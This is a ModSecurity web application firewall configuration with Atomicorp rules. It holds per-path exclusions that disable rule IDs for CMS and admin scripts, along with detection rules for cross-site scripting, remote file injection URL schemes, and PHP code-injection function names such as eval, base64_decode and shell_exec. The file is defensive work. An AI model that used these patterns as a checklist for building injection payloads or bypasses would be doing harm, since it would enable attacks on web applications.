SecRule REQUEST_FILENAME "/modedit\.php" "phase:2,id:91659,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/admin/categories\.php" "phase:2,id:91660,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/addclass\.php" "phase:2,id:91661,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/medialibrary\.php" "phase:2,id:91662,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390700"

SecRule REQUEST_FILENAME "/meta_admin\.php" "phase:2,id:91663,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=340113,ctl:ruleRemovebyID=341211"

SecRule REQUEST_FILENAME "/admin/question_edit\.php" "phase:2,id:91664,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/admin/processors/directory_addedit\.php" "phase:2,id:91665,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=380006"

SecRule REQUEST_FILENAME "/wp-admin/widgets\.php" "phase:2,id:91666,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=380006"

SecRule REQUEST_FILENAME "/admin/aprod\.php" "phase:2,id:91667,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=380006"

SecRule REQUEST_FILENAME "/admin/ritem\.php" "phase:2,id:91668,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=380006"

SecRule REQUEST_FILENAME "/affiliate/scripts/server\.php" "phase:2,id:91669,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/sifr\.swf" "phase:2,id:91670,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/admin/smalladmin/index\.php" "phase:2,id:91671,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340016"

SecRule REQUEST_FILENAME "/content_manager\.php" "phase:2,id:91672,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/account/loginpost/" "phase:2,id:91673,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
SecAction "phase:2,id:91674,t:none,pass,nolog,skipAfter:END_RULES_91674"

SecRule REQUEST_URI|ARGS|ARGS_NAMES|!ARGS:video_credits|!ARGS:move2|!ARGS:hoperation|!ARGS:/custom_code/|!ARGS:arg2|!ARGS:send|!ARGS:resumoDetalhe|!ARGS:bbcode_tpl|!ARGS:Right_photo_1|!ARGS:embedVideo|!ARGS:/^K2ExtraField/|!ARGS:mentorhelp|!ARGS:/submitcode/|!ARGS:beschrijving|!ARGS:custombannercode|!ARGS:bannercode|!ARGS:privatecapacity|!ARGS:diz|!ARGS:FormLayout|!ARGS:/^fck/|!ARGS:parent_name|!ARGS:/^code_tscript/|!ARGS:_qf_Group_next|!ARGS:project_company|!ARGS:categories_title|!ARGS:antwoord|!ARGS:project_company|!ARGS:signature|!ARGS:paepdc|!ARGS:tpl_source|!ARGS:teaser_js|!ARGS:/^autoDS/|!ARGS:FrmSide|!ARGS:mainKeywords|!ARGS:/VB_announce/|!ARGS:guardar|!ARGS:/serendipity/|!ARGS:omschrijving|!ARGS:resolution|!ARGS:newyddionc|!ARGS:bericht|!ARGS:property_copy|!ARGS:/^outpay/|!ARGS:bedrijfsprofiel|!ARGS:s_query|!ARGS:finish_survey|!ARGS:photolater|!ARGS:ticket_response|!ARGS:/element/|!ARGS:option[vbpclosedreason]|!ARGS:/introduction/|!ARGS:/contenido/|!ARGS:/sql/|!ARGS:prefix|!ARGS:query|!ARGS:c_features|!ARGS:/tekst/|!ARGS:embeddump|!ARGS:other_clubs|!ARGS:/^elm/|!ARGS:/^saes/|!ARGS:dlv_instructions|!ARGS:/^cymr/|!ARGS:_qf_Register_upload|!ARGS:/^elm/|!ARGS:verbiage|!ARGS:news|!ARGS:/^wz/|!ARGS:tiny_vals|!ARGS:sSave|!ARGS:/article/|!ARGS:/about/|!ARGS:/Summarize/|!ARGS:/^product_options/|!ARGS:/SiteStructure/|!ARGS:/anmerkung/|!ARGS:/summary/|!ARGS:/edit/|!ARGS:reply|!ARGS:/story/|!ARGS:resource_box|!ARGS:navig|!ARGS:preview__hidden|!ARGS:/page/|!ARGS:order|!ARGS:/post/|!ARGS:youtube|!ARGS:reply|!ARGS:business|!ARGS:/homePage/|!ARGS:pagimenu_inhoud|!ARGS:/note/|!ARGS:Post|!ARGS:/^field_id/|!ARGS:area|!ARGS:/detail/|!ARGS:/comment/|!ARGS:LongDesc|!ARGS:/desc/|!ARGS:ta|!ARGS:/data/|!ARGS:Returnid|!ARGS:busymess|!ARGS_NAMES:/^V\*/|!ARGS_NAMES:/^S\*/|!ARGS:/^quickrise_advertise/|!ARGS:rt_xformat|!ARGS:/wysiwyg/|!ARGS:contingut|!ARGS:/^werg/|!ARGS:/body/|!ARGS:/css/|!ARGS:/^section/|!ARGS:/msg/|!ARGS:t_cont|!ARGS:/^doc/|!ARGS:/xml/|!ARGS:tekst|!ARGS:formsubmit|!ARGS:invoice_snapshot|!ARGS:submit|!ARGS:/message/|!ARGS:/html/|!ARGS:/content/|!ARGS:/footer/|!ARGS:/header/|!ARGS:/link/|!ARGS:/text/|!ARGS:/txt/|!ARGS:/refer/|!ARGS:/referrer/|!ARGS:/template/|!ARGS:/ajax/ "(< ?(?:(?:java|vb)?script|about|applet|activex|chrome) ?>|> ?< ?(img ?src|a ?href) ?= ?(ht|f)tps?:/|\" ?> ?<|\" ?[a-z]+ ?<.*>|> ?\"? ?(>|<)|< ?/?i?frame|\%env)"          "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:replaceComments,t:compressWhiteSpace,t:replaceNulls,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,capture,id:370147,rev:87,severity:2,msg:'Atomicorp.com WAF Rules: Generic XSS filter',logdata:'%{TX.0}'"
SecRule REQUEST_URI|ARGS|ARGS_NAMES|!ARGS:video_credits|!ARGS:move2|!ARGS:hoperation|!ARGS:arg2|!ARGS:resumoDetalhe|!ARGS:send|!ARGS:Right_photo_1|!ARGS:/^K2ExtraField/|!ARGS:bbcode_tpl|!ARGS:embedVideo|!ARGS:/submitcode/|!ARGS:mentorhelp|!ARGS:/custom_code/|!ARGS:beschrijving|!ARGS:custombannercode|!ARGS:bannercode|!ARGS:privatecapacity|!ARGS:diz|!ARGS:FormLayout|!ARGS:parent_name|!ARGS:/^fck/|!ARGS:/^code_tscript/|!ARGS:_qf_Group_next|!ARGS:project_company|!ARGS:categories_title|!ARGS:antwoord|!ARGS:project_company|!ARGS:signature|!ARGS:paepdc|!ARGS:tpl_source|!ARGS:teaser_js|!ARGS:/^autoDS/|!ARGS:FrmSide|!ARGS:mainKeywords|!ARGS:guardar|!ARGS:/VB_announce/|!ARGS:/serendipity/|!ARGS:omschrijving|!ARGS:resolution|!ARGS:newyddionc|!ARGS:bericht|!ARGS:property_copy|!ARGS:/^outpay/|!ARGS:bedrijfsprofiel|!ARGS:s_query|!ARGS:finish_survey|!ARGS:photolater|!ARGS:/element/|!ARGS:ticket_response|!ARGS:option[vbpclosedreason]|!ARGS:embeddump|!ARGS:/introduction/|!ARGS:/contenido/|!ARGS:query|!ARGS:/sql/|!ARGS:prefix|!ARGS:c_features|!ARGS:/tekst/|!ARGS:other_clubs|!ARGS:/^elm/|!ARGS:/^saes/|!ARGS:dlv_instructions!ARGS:/^cymr/|!ARGS:_qf_Register_upload|!ARGS:verbiage|!ARGS:/^wz/|!ARGS:tiny_vals|!ARGS:sSave|!ARGS:/article/|!ARGS:/about/|!ARGS:/^elm/|!ARGS:news|!ARGS:/Summarize/|!ARGS:/^product_options/|!ARGS:/SiteStructure/|!ARGS:/anmerkung/|!ARGS:/summary/|!ARGS:/edit/|!ARGS:reply|!ARGS:/story/|!ARGS:resource_box|!ARGS:preview__hidden|!ARGS:order|!ARGS:youtube|!ARGS:/post/|!ARGS:reply|!ARGS:business|!ARGS:navig|!ARGS:pagimenu_inhoud|!ARGS:/note/|!ARGS:/page/|!ARGS:/homePage/|!ARGS:Post|!ARGS:area|!ARGS:/^field_id/|!ARGS:/detail/|!ARGS:/comment/|!ARGS:LongDesc|!ARGS:/desc/|!ARGS:ta|!ARGS:/data/|!ARGS:Returnid|!ARGS:busymess|!ARGS_NAMES:/^V\*/|!ARGS_NAMES:/^S\*/|!ARGS:/^quickrise_advertise/|!ARGS:rt_xformat|!ARGS:/wysiwyg/|!ARGS:contingut|!ARGS:/^werg/|!ARGS:/body/|!ARGS:/css/|!ARGS:/^section/|!ARGS:/msg/|!ARGS:t_cont|!ARGS:/^doc/|!ARGS:/xml/|!ARGS:googlemap|!ARGS:tekst|!ARGS:formsubmit|!ARGS:invoice_snapshot|!ARGS:submit|!ARGS:/message/|!ARGS:/html/|!ARGS:/content/|!ARGS:/footer/|!ARGS:/header/|!ARGS:/link/|!ARGS:/text/|!ARGS:/txt/|!ARGS:/refer/|!ARGS:/referrer/|!ARGS:/template/|!ARGS:/ajax/  "(?:< ?(?:(?:img|i?frame) ?src|a ?href) ?= ?(?:ogg|tls|ssl|gopher|zlib|(ht|f)tps?)\:/|alert ?\(|<? (?:(?:java|vb)?script|applet|activex|chrome) ?>|\" ?> ?<|\" ?[a-z]+ ?<.*>|> ?\"? ?>|< ?/?i?frame|\%env)"           "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:replaceComments,t:compressWhiteSpace,t:replaceNulls,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,multimatch,capture,id:370148,rev:95,severity:2,msg:'Atomicorp.com WAF Rules: Cross Site Scripting Attack',logdata:'%{TX.0}'"

SecMarker END_RULES_91674

SecRule REQUEST_FILENAME "/admin/package_edit\.php" "phase:2,id:91675,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/cgi-bin/setup\.cgi" "phase:2,id:91676,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/pncrtl/template\.php" "phase:2,id:91677,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340007"

SecRule REQUEST_FILENAME "/novedades_abm\.php" "phase:2,id:91678,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/cgi-bin/pmanage/pmanage\.cgi" "phase:2,id:91679,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/sage/download\.php" "phase:2,id:91680,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/versioncheck\.php" "phase:2,id:91681,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=330700"

SecRule REQUEST_FILENAME "/kameleon\.php" "phase:2,id:91682,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340026"
SecAction "phase:2,id:91683,t:none,pass,nolog,skipAfter:END_RULES_91683"


#SecRule ARGS "!@pmFromFile trusted-domains.txt" chain
SecRule REQUEST_URI|ARGS|!ARGS:static|!ARGS:/url/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "phase:2,deny,log,auditlog,status:403,capture,id:370149,t:none,t:normalisePath,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,chain,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (AE)',logdata:'%{TX.0}'"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule REQUEST_URI|ARGS|!ARGS:static|!ARGS:/url/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "phase:2,deny,log,auditlog,status:403,id:370150,t:none,t:normalisePath,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,capture,chain,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (MM)',logdata:'%{TX.0}'"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"


SecMarker END_RULES_91683

SecRule REQUEST_FILENAME "/click\.php" "phase:2,id:91684,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340026"
SecAction "phase:2,id:91685,t:none,pass,nolog,skipAfter:END_RULES_91685"

SecRule REQUEST_URI|ARGS|!ARGS:/url/|!ARGS:to|!ARGS:from|!ARGS:lnk|!ARGS:to|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:c "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "phase:2,deny,log,auditlog,status:403,capture,id:370151,t:none,t:normalisePath,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,chain,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (AE)',logdata:'%{TX.0}'"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule REQUEST_URI|ARGS|!ARGS:/url/|!ARGS:to|!ARGS:from|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:c "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "phase:2,deny,log,auditlog,status:403,id:370152,t:none,t:normalisePath,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,capture,chain,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (MM)',logdata:'%{TX.0}'"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecMarker END_RULES_91685

SecRule REQUEST_FILENAME "/admin/cruise_co_process\.php" "phase:2,id:91686,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340152"

SecRule REQUEST_FILENAME "/supportcenter/" "phase:2,id:91687,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340152"

SecRule REQUEST_FILENAME "/sendmail\.php" "phase:2,id:91688,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340113,ctl:ruleRemovebyID=341211"

SecRule REQUEST_FILENAME "/files_code\.php" "phase:2,id:91689,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91690,t:none,pass,nolog,skipAfter:END_RULES_91690"

SecRule REQUEST_URI|ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/hidden/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "phase:2,deny,log,auditlog,status:403,capture,id:370153,t:none,t:normalisePath,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,chain,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (AE)',logdata:'%{TX.0}'"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule REQUEST_URI|ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/hidden/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "phase:2,deny,log,auditlog,status:403,id:370154,t:none,t:normalisePath,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,capture,chain,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (MM)',logdata:'%{TX.0}'"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecMarker END_RULES_91690

SecRule REQUEST_FILENAME "/modify\.php" "phase:2,id:91691,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91692,t:none,pass,nolog,skipAfter:END_RULES_91692"

SecRule REQUEST_URI|ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/direct/|!ARGS:/thumb/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "phase:2,deny,log,auditlog,status:403,capture,id:370155,t:none,t:normalisePath,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,chain,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (AE)',logdata:'%{TX.0}'"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule REQUEST_URI|ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/direct/|!ARGS:/thumb/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "phase:2,deny,log,auditlog,status:403,id:370156,t:none,t:normalisePath,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,capture,chain,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (MM)',logdata:'%{TX.0}'"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecMarker END_RULES_91692

SecRule REQUEST_FILENAME "/admin/layout/edit/" "phase:2,id:91693,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=380018,ctl:ruleRemovebyID=380019,ctl:ruleRemovebyID=380020"
SecAction "phase:2,id:91694,t:none,pass,nolog,skipAfter:END_RULES_91694"

SecRule ARGS|REQUEST_URI_RAW|XML:/*|!ARGS:filecontent|!ARGS:/template/|!ARGS:/header/|!ARGS:/^layout/  "(?:define|fgets|move_uploaded_file|readfile|ftp_put|ftp_fget|gzd?en?code|gzinflate|ftp_nb_put|bzopen|readdir|gzread|fopen|ftp_nb_f(put|get)|ftp_get|scandir|fscanf|readgzfile|fread|proc_open|fgetc|fgetss|ftp_fput|ftp_nb_get|session_start|fwrite|gzwrite|gzopen|gzcompress|curl_multi_exec|curl_exec|eval|create_function|base64_decode|decode_base64|str_rot13|php_uname|file_get_contents|include|require|require_once|parse_ini_file|shell_exec|popen|ini_(?:get|restore)|safe_mode|phpinfo|system|exec|passthru|serialize|include|php_uname|preg_\w+|execute)\s*[\"\(@]"  "phase:2,deny,log,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,capture,auditlog,msg:'Atomicorp.com WAF Rules: Potentially malicious PHP code injection attempt',id:370157,rev:1,logdata:'%{TX.0}',severity:'2'"

SecMarker END_RULES_91694

SecRule REQUEST_FILENAME "/edit_behaviour\.php" "phase:2,id:91695,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340016,ctl:ruleRemovebyID=340146,ctl:ruleRemovebyID=340017,ctl:ruleRemovebyID=340144,ctl:ruleRemovebyID=340145,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=331026,ctl:ruleRemovebyID=331027,ctl:ruleRemovebyID=331028,ctl:ruleRemovebyID=390572,ctl:ruleRemovebyID=340159,ctl:ruleRemovebyID=340164,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340156,ctl:ruleRemovebyID=340155,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=340157,ctl:ruleRemovebyID=340160,ctl:ruleRemovebyID=344371,ctl:ruleRemovebyID=390711,ctl:ruleRemovebyID=380022,ctl:ruleRemovebyID=380121,ctl:ruleRemovebyID=380122,ctl:ruleRemovebyID=380023,ctl:ruleRemovebyID=380024,ctl:ruleRemovebyID=380025,ctl:ruleRemovebyID=381025,ctl:ruleRemovebyID=380126"

SecRule REQUEST_FILENAME "/otrs/index\.pl" "phase:2,id:91696,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390715,ctl:ruleRemovebyID=340009,ctl:ruleRemovebyID=390709,ctl:ruleRemovebyID=340007,ctl:ruleRemovebyID=340006,ctl:ruleRemovebyID=340008,ctl:ruleRemovebyID=340095,ctl:ruleRemovebyID=340027,ctl:ruleRemovebyID=340011,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=340128,ctl:ruleRemovebyID=340131,ctl:ruleRemovebyID=380018,ctl:ruleRemovebyID=380019,ctl:ruleRemovebyID=380020"

SecRule REQUEST_FILENAME "/content/edit/" "phase:2,id:91697,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/ises/config\.php" "phase:2,id:91698,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91699,t:none,pass,nolog,skipAfter:END_RULES_91699"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/^func_key/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "phase:2,deny,log,auditlog,status:403,id:360663,chain,t:none,t:normalisePath,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

